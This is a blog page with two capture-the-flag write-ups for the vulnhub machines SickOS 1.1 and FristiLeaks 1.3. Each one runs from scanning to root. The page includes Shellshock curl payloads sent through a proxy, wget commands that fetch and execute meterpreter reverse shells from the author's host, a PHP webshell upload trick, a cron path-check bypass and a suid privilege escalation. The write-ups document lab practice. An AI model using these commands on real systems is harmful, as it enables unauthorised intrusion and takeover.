Tuesday, December 29, 2015

SickOS 1.1 writeup

Quick writeup about SickOS 1.1 from vulnhub.

As usual, nmap is the first runner:
$ nmap -p- -A -v -T5 $IP

apart port 22/tcp, it's interesting that it runs an open proxy on port 3128.

as a test I configured my browser to use this proxy and browsed http://127.0.0.1:80 to see a funny welcome page:




time to wake up nikto, configured to use the proxy of course:
$ nikto -host 127.0.0.1 -useproxy
our good fellow found a possible way in:



nikto is right:
$ curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://$IP:3128 http://127.0.0.1/cgi-bin/statusreplies with:


i expect to be a non-privileged user, so to have a more confident environment i created a meterpreter revshell with msfvenom, downloaded and executed it:

$ CMD="/usr/bin/wget -O /tmp/revshell http://$ME/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128 http://127.0.0.1/cgi-bin/status
$ CMD="/bin/chmod 755 /tmp/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128 http://127.0.0.1/cgi-bin/status
$ CMD="/tmp/revshell"
$ curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://$IP:3128 http://127.0.0.1/cgi-bin/status
msfconsole shows up a new session as uid 33 (www-data): time to enumerate the system and get root.

/var/www lists a CMS, already seen with nikto because of it's in robots.txt Disallow list, but a .py get my attention first. it's world-writable and world-executable and it says:
print "I Try to connect things very frequently\n"
print "You may want to try my services"

in the hope that "I" means "root", i tried a simple:

$ echo "import os" >> connect.py
$ echo "os.system('touch /tmp/foo')" >> connect.py
and waited a couple of seconds before to ls -al /tmp:


so connect.py is executed by root every a while, good find.

to be faster to execute code i added another line to connect.py:
$ echo "os.system('/tmp/run')" >> /var/www/connect.py
then i created a new meterpreter reverseshell, and downloaded+executed it:

$ echo "#!/bin/bash" > /tmp/run
$ echo "wget -O /tmp/revshell4445 http://10.80.1.60/revshell4445" >> /tmp/run
$ echo "chmod 755 /tmp/revshell4445" >> /tmp/run
$ echo "/tmp/revshell4445 &" >> /tmp/run
$ echo "rm -f /tmp/run" >> /tmp/run
$ chmod 755 /tmp/run
after a minute i see a new session on msfconsole:


and the flag is:


thanks to D4rk for letting me play with his vulnerable box.

Thursday, December 24, 2015

FristiLeaks 1.3 writeup

You should know it, put somewhere a pink logo and I can't resist.
Downloaded and imported FristiLeaks 1.3 ova file, with a couple of hiccup because of vmware fusion STFU, runt nmap against it:
$ nmap -p- -A -v $IP



we can see that port 80 is open, site homepage says "drink fristi" and nothing more.

now nikto is my next step:
$ nikto -host $IP
[cut]
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
[cut]

I found it interesting that all the three directories are drinks and that homepage says drink fristi:
I tried to open also /fristi/, which give back an admin panel.


sqlmap is very cheap to run in background while you read source code, so I captured the POST request and passed to her even if in this case is useless.

homepage source code embed a base64 encoded string in a comment at the very bottom of the source, i pasted the code in file b to decode it:
$ base64 -D -i a -o b

then file b says that it's an image:


renaming it to b.png and opening it show us that this image is actually a string:


back to the source code we can see that the header report the name of the creator of the page:


with some guess I tried to login as eezeepz using the string token from the image as password, and bingo.

I'm now in front of a file upload form: time to fire up burp suite again and try to upload a webshell.
after a few minutes of unsuccessful try, from content/type to case mixup, from uncommon extension to good ol' nullbyte, i tried to upload a file with double extension to exploit a possible misconfiguration in Apache (see AddHandler/AddType) and bingo: shell.php.jpg gets executed as php code:


time to meterpreter the host, i download a php/meterpreter_reverse_tcp using wget visiting che url
http://$IP/fristi/uploads/shell.php.png?c=wget%20http://$ME/shell.txt%20-O%20shell.php

and executing it visiting http://$IP/fristi/uploads/shell.php

a quick view at docroot doesn't give me anything useful, even mysql database (cat checklogin.php) doesn't help me.

time to enumerate, /etc/passwd talks about four possible targets:
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin

starting from fristi, who names the game, we can see a notes.txt file:


ok, eezeepz is also the "web developer", so i'm sure i'll find interesting stuff in his mess.

listing files i found another notes.txt:


so we can execute commands as admin, sum it up the requirements:
  • must start with /usr/bin/ or
  • must be in /home/admin/
i can't see what's in /home/admin so i have to trust that there are only chmod, df, cat, echo, ps, grep and egrep.
let's see if this works:
echo "/home/admin/echo \`whoami\`" > /tmp/runthis
chmod 755 /tmp/runthis


after a minute i can see /tmp/cronresult:


let's see if we can fool the check for ^/usr/bin/:
echo "/usr/bin/../../bin/ls -al" > /tmp/runthis
chmod 755 /tmp/runthis













cool!
df says we have space enough to copy /home/admin to /tmp, so:
echo "/usr/bin/../../bin/cp -R /home/admin /tmp/admin" > /tmp/runthis
echo "/home/admin/chmod -R 777 /tmp/admin" >> /tmp/runthis
chmod 755 /tmp/runthis

after less than a minute i see /tmp/admin:

remove /tmp/runthis to avoid it to run again with rm -f /tmp/runthis

so, cryptedpass.txt and cryptpass.py in the same place. no need to say what i would do.

cryptpass.py is very easy:


it takes a string, base64encode then rot13 from the end to the beginning.
the script that takes cryptedpass and decode it is:


both cryptedpass.txt and whoisyourgodnow.txt contain encrypted password

let's try some "su" with this two passwords against the username we found in /etc/passwd starting with a plain shell:
python -c 'import pty; pty.spawn("/bin/bash")'

i found that i can su as admin, but since i can execute command with that uid i don't care so much.
decoded password from whoisyourgodnow.txt let me to su as fristigod.

his home have interesting stuff:


cat .bash_history types herself:


great, the user can someway sudo. let's see what he can execute with sudo -l:


not so much apparently...but doCom is suid ;)


easy bet:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
replies with our beloved:
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

time to get a shell:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

/root of course contains a .txt file with the flag:


and a message that has a typo, because this image is distributed as 1.3 and txt speaks of 1.0, but who cares? :)

thanks Ar0xA for letting me spend some time playin with this box